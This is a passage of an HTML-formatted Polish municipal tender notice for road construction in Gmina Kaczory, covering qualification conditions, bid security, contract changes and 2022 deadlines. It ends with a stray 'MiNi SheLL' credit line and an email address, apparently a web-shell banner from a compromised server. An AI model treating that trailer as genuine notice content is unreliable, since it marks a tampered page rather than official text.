class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym;<br/> Zamawiający nie określa warunków w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/> Zamawiający nie określa warunków w powyższym zakresie.<br/>3) sytuacji ekonomicznej i finansowej;<br/> a) dla części nr 1 - posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 585.000,00 zł (słownie: pięćset osiemdziesiąt pięć tysięcy złotych 00/100), co potwierdzą poprzez złożenie aktualnej informacji banku;<br/> b) dla części nr 2 - posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 1.920.000,00 zł (słownie: jeden milion dziewięćset dwadzieścia tysięcy złotych 00/100), co potwierdzą poprzez złożenie aktualnej informacji banku;<br/>Wykonawca składający ofertę na wszystkie części będzie zobowiązany do wykazania, że posiada środki finansowe w wysokości łącznej dla obu części.<br/>4) zdolności technicznej lub zawodowej: tj.<br/>a) dla części nr 1 i części nr 2<br/> dysponują lub będą dysponować kierownikiem budowy posiadającym uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności drogowej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w <br/>aktualnym stanie prawnym pozwalają uprawnienia budowlane w tej specjalności, co potwierdzą w wykazie osób zdolnych do realizacji zamówienia,<br/>b) dla części nr 1 - wykonali należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończyli w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie min. 1 robotę budowlaną polegającą na budowie lub przebudowie drogi o nawierzchni z kostki betonowej na kwotę minimum <br/> 400 000,00 zł brutto co potwierdzą w wykazie wykonanych robót oraz referencjami;<br/> dla części nr 2 - wykonali należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończyli w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie min. 1 robotę budowlaną polegającą na budowie lub przebudowie drogi o nawierzchni bitumicznej na kwotę minimum <br/> 1 000 000,00 zł brutto co potwierdzą w wykazie wykonanych robót oraz referencjami;<br/>2. W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca może polegać na potencjale podmiotu udostępniającego zasoby na zasadach opisanych w art. 118–123 ustawy Pzp. <br/>Podmiot, na potencjał którego wykonawca powołuje się w celu wykazania spełnienia warunków udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych <br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 poz. 835)<br/>3. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie potwierdzają spełniania przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu. <br/>4. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby. <br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że: <br/>1) wspólnie muszą wykazać, że wspólnie spełniają warunki udziału w postępowaniu, <br/>2) w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia z postępowania na art. 109 ust. 1 pkt. 4 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 poz. 835)<br/>3) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania, <br/>4) muszą ustanowić pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Pełnomocnictwo musi mieć formę pisemną lub kopię <br/>potwierdzona przez notariusza, <br/>5) przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych wykonawców. <br/>6) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>7)Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie, z którego będzie wynikać, które roboty budowlane wykonają poszczególni wykonawcy <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe (aktualne na dzień złożenia) składane na wezwanie Zamawiającego (zgodnie z art. 274 ust. 1 ustawy Pzp ) przez wykonawcę, którego oferta została najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5 dni.<br/>1) W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu udzielenie zamówienia publicznego, Zamawiający może żąda następujących podmiotowych środków dowodowych:<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, wystawionych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b) oświadczenia o braku przynależności do grupy kapitałowej (wg załącznika Nr 3).<br/>Zamawiający żąda od wykonawcy, który na potwierdzenie spełniania warunków udział u w postępowaniu, polega na zdolnościach<br/>lub sytuacji innych podmiotów, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt. 1 ppkt. 1 lit. a) i b).<br/>2)W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, sytuacji finansowej, Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>a) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wg załącznika Nr 4),<br/>b) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty ( wg załącznika Nr 9)<br/>c) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo - gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. W przypadku wykonawców<br/>ubiegających się wspólnie o udzielenie zamówienia, z którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia; powinno zawierać: nazwę postępowania o zamówienie publiczne, którego dotyczy, wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, ustanowionego pełnomocnika oraz zakres jego umocowania. Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza.<br/>4) Zobowiązanie podmiotu (jeżeli dotyczy) udostępniającego zasoby lub inny podmiotowy środek dowodowy potwierdzający, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą,<br/>Wzór zobowiązania określa załącznik Nr 6.<br/>Zobowiązanie musi być złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie:<br/>a) Dla Części Nr 1 – 6 000,00 zł (słownie: sześć tysięcy złotych 00/100)<br/>b) Dla Części Nr 2 – 20 000,00 zł (słownie: dwadzieścia tysięcy złotych 00/100)<br/>2. Wadium musi obejmować pełen okres związania ofertą tj. do dnia 19.07.2022 r. <br/>3. Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy: <br/>Bank : Bank Spółdzielczy w Kaczorach<br/>Nr rachunku : 82 8945 0002 0010 0120 2000 0050<br/>z dopiskiem na blankiecie przelewu: wadium na zabezpieczenie oferty dla zadania: <br/>Budowa i przebudowa sieci dróg gminnych w Gminie Kaczory<br/>Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed upływem<br/>terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:<br/>1) wspólnie muszą wykazać, że wspólnie spełniają warunki udziału w postępowaniu,<br/>2) w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia z postępowania na art. 109 ust. 1 pkt. 4 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 poz. 835)<br/>3) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,<br/>4) muszą ustanowić pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia.<br/>Pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzona przez notariusza,<br/>5) przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych wykonawców.<br/>6) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7)Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie, z którego będzie wynikać, które roboty budowlane wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający udzieli zaliczki w zakresie realizacji części nr 1 oraz części nr 2 przedmiotu zamówienia, która zostanie wypłacona zgodnie z warunkami wypłat dofinansowania z Programu Rządowy Fundusz Polski Ład Program<br/>Inwestycji Strategicznych.<br/>3) Zaliczka zostanie udzielona w wysokości 5% całkowitej ceny ofertowej w terminie do 30 dni od dnia podpisania umowy na podstawie faktury zaliczkowej.<br/>4) Zamawiający przekaże Wykonawcy zaliczkę na wskazane konto bankowe. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz okoliczności i warunków dopuszczalnych zmian treści zawartej umowy określonych w rozdziale XVII SWZ, Zamawiający przewiduje możliwość dokonania zmiany w zawartej umowie w niżej wymienionych przypadkach:<br/>1) Zamawiający dopuszcza przedłużenie terminu wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie ma lub będzie miało wpływ na wykonanie umowy w przypadku utrudnień spowodowanych stanem epidemii w kraju, które miały wpływ na:<br/>dostęp do zakupu materiałów budowalnych,<br/>transport materiałów,<br/>ograniczony czas pracy pracowników,<br/>przemieszczanie się ludzi i sprzętu,<br/>wykonanie części robót przez podwykonawców, jeżeli opóźnienia były spowodowane okolicznościami, o których mowa w niniejszym punkcie.<br/>2) W uzasadnionych przypadkach Zamawiający może dopuścić wprowadzanie zmian w stosunku do dokumentacji projektowej, w trakcie prowadzenia inwestycji w zakresie technologii wykonania elementów robót. Dopuszcza się je tylko, gdy proponowane przez Inżyniera lub Zamawiającego rozwiązanie jest lepsze funkcjonalnie od tego, jakie przewiduje projekt i nie prowadzi do zmiany wynagrodzenia Wykonawcy o więcej niż 5% należnego wynagrodzenia.<br/>3) Zamawiający dopuszcza inne zmiany postanowień umowy, takie jak:<br/>a) zmiany technologii wykonywania robót i/lub rodzaju materiałów, z których będą wykonane roboty budowlane, w przypadku w szczególności zaprzestania produkcji materiału bądź wycofania i wprowadzenia przez producenta materiału o parametrach i cechach użytkowych lepszych lub jakościowo wyższych lub technologicznie nowszych albo właściwszych w<br/>zaistniałej sytuacji. Zmiana rodzaju materiałów wymaga pisemnej akceptacji Zamawiającego, uzyskanie której wymaga przedstawienia przez Wykonawcę szczegółowego uzasadnienia zmiany wraz z pisemnym potwierdzeniem producenta parametrów nowych materiałów. Zmiana rodzaju materiałów i/lub technologii realizacji, jeśli nie powoduje zmiany wynagrodzenia nie wymaga sporządzenia aneksu do umowy,<br/>b) zmiana umowy w zakresie podwykonawców, za uprzednią zgodą Zamawiającego, tj. możliwe powierzenie podwykonawcom innej części robót niż wskazana w ofercie Wykonawcy, rezygnacja z planowanego podwykonawstwa, a także możliwa zmiana podwykonawcy na etapie realizacji robót, o ile nie sprzeciwia się to postanowieniom SIWZ,<br/>c) zmiana sposobu rozliczania umowy ( inne terminy rozliczania lub za inne części wykonanych robót ) lub dokonywanie płatności na rzecz Wykonawcy na skutek np. zmian zawartej przez Zamawiającego umowy o dofinansowanie<br/>przedsięwzięcia,<br/>d) zmiana wynikająca z przejęcia zobowiązań przez Zamawiającego względem podwykonawców Wykonawcy.<br/>2. Przewiduje się możliwość dokonania zmiany Wykonawcy, z którym zawarto umowę, i którego ma zastąpić nowy Wykonawca w wyniku połączenia, podziału, przekształcenia, lub nabycia dotychczasowego Wykonawcy lub jego<br/>przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy,<br/>3. W przypadku ograniczenia zakresu przedmiotu umowy, ale nie więcej niż o 10%, wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie udokumentowane poniesione już koszty tego zakresu rzeczowego.<br/>4. Jeżeli w toku realizacji przedmiotu umowy Strony ustalą wykonanie robót zamiennych, to roboty pierwotnie planowane zostaną wyłączone z zakresu podstawowego przedmiotu umowy na podstawie zakresu zmian określonych w protokołach konieczności oraz na podstawie cen jednostkowych i czynników kalkulacyjnych określonych w kosztorysie ofertowym<br/>Wykonawcy, a w przypadku braku takich elementów rozliczeniowych, podstawą będą powszechnie stosowane katalogi KNR<br/>i ceny rynku lokalnego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://przetargi.kaczory.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-20 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com